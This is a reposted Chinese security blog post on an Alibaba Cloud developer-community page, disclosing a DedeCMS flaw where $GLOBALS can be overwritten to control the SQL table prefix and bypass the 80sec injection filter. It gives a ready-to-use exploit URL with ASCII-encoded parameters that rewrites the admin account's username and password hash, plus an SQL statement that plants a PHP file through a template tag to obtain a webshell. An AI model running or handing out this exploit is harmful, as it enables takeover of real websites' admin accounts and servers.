开发者社区> cnbird> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

dedecms最新版本修改任意管理员漏洞

简介: http://www.unhonker.com/bug/1272.html 此漏洞无视gpc转义,过80sec注入防御。
+关注继续查看

http://www.unhonker.com/bug/1272.html

此漏洞无视gpc转义,过80sec注入防御。

补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?

起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。

include/dedesql.class.php
 
if(isset($GLOBALS['arrs1']))
 
{
 
    $v1= $v2 = '';
 
    for($i=0;isset($arrs1[$i]);$i++)
 
    {
 
        $v1.= chr($arrs1[$i]);
 
    }
 
    for($i=0;isset($arrs2[$i]);$i++)
 
    {
 
        $v2.= chr($arrs2[$i]);  //解码ascii
 
    }
 
    $GLOBALS[$v1] .=$v2; //注意这里不是覆盖,是+
 
}
 
    functionSetQuery($sql)
 
    {
 
        $prefix="#@__";
 
        $sql= str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。
 
        $this->queryString =$sql;
 
    }

另外说下绕过80sec防注入的方法。
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if($open==1)
 
{
 
    $id= isset($id) &&is_numeric($id) ?$id : 0;
 
    $link= base64_decode(urldecode($link));
 
    $hash= md5($link);
 
//这里的#@_是可以控制的
 
    $rs= $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");
 
    if($rsExecNoneQuery($query);
 
    }
 
    header("location:$link");
 
    exit();
 
}

构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'

EXP:

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。

如果找不到后台,参见以前修改数据库直接拿SHELL的方法
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'','''');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
转自:https://www.t00ls.net/thread-23071-1-1.html

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1403.html

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏洞。
116 0
[Shell 脚本] Shell脚本操作OSS服务:PUT、GET(纯shell脚本无sdk)
前提: 一般情况下对OSS操作都会通过SDK,但是很多情况下对OSS进行简单的上传下载的操作,那么SDK就显得有些臃肿,先要下载sdk包,然后再写些简单的操作脚本,而通过shell脚本就会简单很多。 而且很多场景:线上网站、数据库等,生产出来的网站数据、数据库数据、日志数据都需要来备份,如果备份再本地磁盘,那么没过多久磁盘空间就占用光了,如果是NAS来备份数据,价格又比较贵,如果把数据备份到OSS 低频存储就比较实惠一些。
3845 0
【最佳实践】通过Terraform 管理OSS资源
1.Terraform简介    Terraform 是一个开源的自动化的资源编排工具,支持多家云服务提供商。阿里云作为第三大云服务提供商,terraform-alicloud-provider 已经支持了超过 90 多个 Resource 和 Data Source,覆盖20多个服务和产品,吸引了越来越多的开发者加入到阿里云Terraform生态的建设中。
3482 0
dedecms获取县市区表
在edit_fullinfo.php中 $postform = $membermodel->getForm('edit', $row, 'membermodel'); 获得表单项 再去查看getForm方法, $formstring .
1042 0
RedHat系列软件管理(第二版) --脚本安装
RedHat系列软件管理 --脚本安装   一、解压缩 tar -zxvf webmin-1.
598 0
修改dedecms面包屑导航的首页链接关键字
  dedecms面包屑导航默认是"主页>分类>二级分类>",我们知道链接的锚文字对排名有一定影响,这时可以考虑将“主页”改成具体的关键字,那么如何修改dedecms面包屑导航的首页链接关键字呢?你可能也想知道帝国cms面包屑导航的首页链接锚文本改成关键字   方法1.登陆网站后台,系统》系统基本参数》站点设置,将主页链接名改成具体的关键词   保存,重新生成文档html   方法2.直接从代码里面写固定。
985 0
SYS_并发管理系列5_并发程序管理器程序诊断脚本REQCHECK.sql(案例)
2012-03-05 Created By BaoXinjian 一、摘要 Oracle Metalink 提供一个诊断并发程式进程的脚本 This Script is made available for Diagnosing Common Problems Related to Concurrent Requests 该脚本的主要作用 1.
887 0
+关注
cnbird
阿里云安全专家,主要负责阿里云云产品安全。
4032
文章
3
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载